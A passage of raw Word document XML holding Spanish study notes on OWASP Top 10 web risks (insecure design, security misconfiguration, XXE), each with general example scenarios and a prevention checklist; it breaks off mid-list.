          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para validar o recuperar credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BB0DE" w14:textId="28769856" w:rsidR="00B01F42" w:rsidRPr="00AE18AA" w:rsidRDefault="00AE18AA" w:rsidP="00AE18AA">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 2</w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Atacantes modelan el flujo de una cadena de cines que permite reservar grupos antes de solicitar depósito para tomar muchos asientos en todos los cines a la vez en pocas solicitudes, lo que provocaría una pérdida masiva de ingresos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540D190D" w14:textId="14E2AF8D" w:rsidR="00B01F42" w:rsidRPr="00AE18AA" w:rsidRDefault="00AE18AA" w:rsidP="00AE18AA">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Un sitio web de comercio no tiene protección contra bots. Estos compran tarjetas de video para revenderlos en páginas web de subastas. Con políticas anti-bots </w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>y reglas de lógica de dominio, se puede evitar compras no auténticas y rechazar dichas transacciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA49B3" w14:textId="77777777" w:rsidR="00AE18AA" w:rsidRDefault="00B01F42" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB610E2" w14:textId="7B5D0164" w:rsidR="00AE18AA" w:rsidRPr="00AE18AA" w:rsidRDefault="00B01F42" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Establecer y usar ciclos de vida de desarrollo seguro con </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de seguridad profesionales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236CB8E0" w14:textId="7E150272" w:rsidR="00AE18AA" w:rsidRPr="00AE18AA" w:rsidRDefault="00AE18AA" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Establecer y utilizar una biblioteca de patrones de diseño seguros o componentes de “Paved Road”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A32437" w14:textId="77777777" w:rsidR="00AE18AA" w:rsidRPr="00AE18AA" w:rsidRDefault="00DE2A69" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tili</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>zar</w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el modelo de amenazas pa</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a autenticación critica, control de acceso, lógica empresarial y flujo clave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE94650" w14:textId="77777777" w:rsidR="00AE18AA" w:rsidRPr="00AE18AA" w:rsidRDefault="00DE2A69" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Integrar</w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lenguaje,</w:t>
      </w:r>
      <w:r w:rsidR="00B01F42" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> control de seguridad de historia de usu</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472CECAE" w14:textId="77777777" w:rsidR="00AE18AA" w:rsidRPr="00AE18AA" w:rsidRDefault="00DE2A69" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>erificaciones de admisión en cada nivel de aplicación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE777F" w14:textId="7ADB392A" w:rsidR="00DE2A69" w:rsidRPr="00AE18AA" w:rsidRDefault="00DE2A69" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>scribir pruebas de integración y pruebas unitarias para validar que todos los flujos sean resistentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA1DF6" w14:textId="77777777" w:rsidR="00AE18AA" w:rsidRPr="00AE18AA" w:rsidRDefault="00AE18AA" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Compilar casos de uso y caso de uso indebido para cada nivel de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="734D84E2" w14:textId="77777777" w:rsidR="00AE18AA" w:rsidRPr="00AE18AA" w:rsidRDefault="00DE2A69" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>eparar capas de niveles de sistema y red según necesidad de exposición y protección</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40869AA0" w14:textId="77777777" w:rsidR="00AE18AA" w:rsidRPr="00AE18AA" w:rsidRDefault="00AE18AA" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">eparar los </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A69" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>usuarios que comparten privilegios en el software</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de manera robusta por diseño de todos los niveles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8353CB" w14:textId="44565EFB" w:rsidR="00816078" w:rsidRPr="00AE18AA" w:rsidRDefault="00DE2A69" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">imitar el uso de recursos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260681F5" w14:textId="77777777" w:rsidR="00816078" w:rsidRDefault="00816078" w:rsidP="00816078">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1586F0DA" w14:textId="40F0B50E" w:rsidR="00B01F42" w:rsidRPr="00AE18AA" w:rsidRDefault="00830124" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A05 – Configuración de Seguridad Incorrecta</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Se requiere tener bien definida e implementada una </w:t>
      </w:r>
      <w:r w:rsidR="00816078" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>configuración segura</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para la aplicación, marco de trabajo, servidor de aplicación, servidor web, base de datos y plataforma. Todo esto no es seguro por defecto, se debe mantener todo actualizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D28899" w14:textId="4853788F" w:rsidR="00830124" w:rsidRDefault="00AE18AA" w:rsidP="00AE18AA">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D213B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 1</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00830124" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> App basadas en ambientes de trabajo como Struts o</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spring. Tiene una falla en XSS. Hasta que no se actualice los atacantes podrán hacer uso de esta de este fallo. </w:t>
      </w:r>
      <w:r w:rsidR="0056249C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C880CD9" w14:textId="6DEFC121" w:rsidR="0056249C" w:rsidRDefault="00D213B2" w:rsidP="00D213B2">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D213B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 2</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> La </w:t>
      </w:r>
      <w:r w:rsidR="00816078" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>configuración</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del servidor devuelve a los usuarios mensajes detallados de los errores, exponiendo </w:t>
      </w:r>
      <w:r w:rsidR="00816078" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>información</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> confidencial o falla subyacentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E649D4" w14:textId="707B8173" w:rsidR="00EB097A" w:rsidRDefault="00EB097A" w:rsidP="00D213B2">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>revención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE68C1" w14:textId="5BD44F79" w:rsidR="00EB097A" w:rsidRDefault="00EB097A" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Disponer de un proceso rápido, fácil y repetible de fortalecimiento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E4A317" w14:textId="7A5DBDAD" w:rsidR="00EB097A" w:rsidRDefault="00EB097A" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Proceso para mantener y desplegar las </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>act</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Y parches en cada entorno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0891F8EC" w14:textId="796E0B12" w:rsidR="00EB097A" w:rsidRDefault="00EB097A" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Arquitectura de aplicación que proporcione separación segura y efectiva entre los componentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA099D8" w14:textId="7A37E4F7" w:rsidR="00EB097A" w:rsidRPr="00EB097A" w:rsidRDefault="00EB097A" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejecutar escaneo y realizar auditorias regularmente para identificar fallos de configuración o parches omitidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26047E38" w14:textId="54D2E6B9" w:rsidR="00D213B2" w:rsidRDefault="0056249C" w:rsidP="00D213B2">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D213B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Entidad Externa de XML </w:t>
      </w:r>
      <w:r w:rsidR="00816078" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(XXE)</w:t>
      </w:r>
      <w:r w:rsidR="00D213B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Refiere a la capacidad de un atacante para influir en el procesamiento del XML al incluir entidades externas y hacer que la aplicación acceda </w:t>
      </w:r>
      <w:r w:rsidR="003A59BE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>procese archivos externos.</w:t>
      </w:r>
      <w:r w:rsidR="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Una entidad externa en XML es una referencia a un archivo externo que se puede incluir en el documento XML. Por ejemplo: DTD.</w:t>
      </w:r>
      <w:r w:rsidR="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">La vulnerabilidad XXE ocurre cuando una aplicación no valida ni restringe adecuadamente las entidades externas en el procesamiento XML permitiendo que el atacante proporcione una entidad externa que apunte a un archivo sensible, escanee puertos, haga ejecución remota del código, ataques de denegación de servicio, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296577BB" w14:textId="77777777" w:rsidR="00D213B2" w:rsidRDefault="0056249C" w:rsidP="00D213B2">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00816078">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37EF2D" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRDefault="00816078" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">sar formatos como JSON, evitar </w:t>
      </w:r>
      <w:r w:rsidRPr="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>serialización</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de datos confidenciales</w:t>
      </w:r>
      <w:r w:rsidRPr="00D213B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C594D" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRDefault="00816078" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ctualizar procesadores y bibliotecas XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF87190" w14:textId="77777777" w:rsidR="00EB097A" w:rsidRDefault="00816078" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="0056249C" w:rsidRPr="00EB097A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sar validadores de dependencias y SOAP a 1.2 o superior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8064E9" w14:textId="2B0EC11E" w:rsidR="00EB097A" w:rsidRDefault="00816078" w:rsidP="00EB097A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
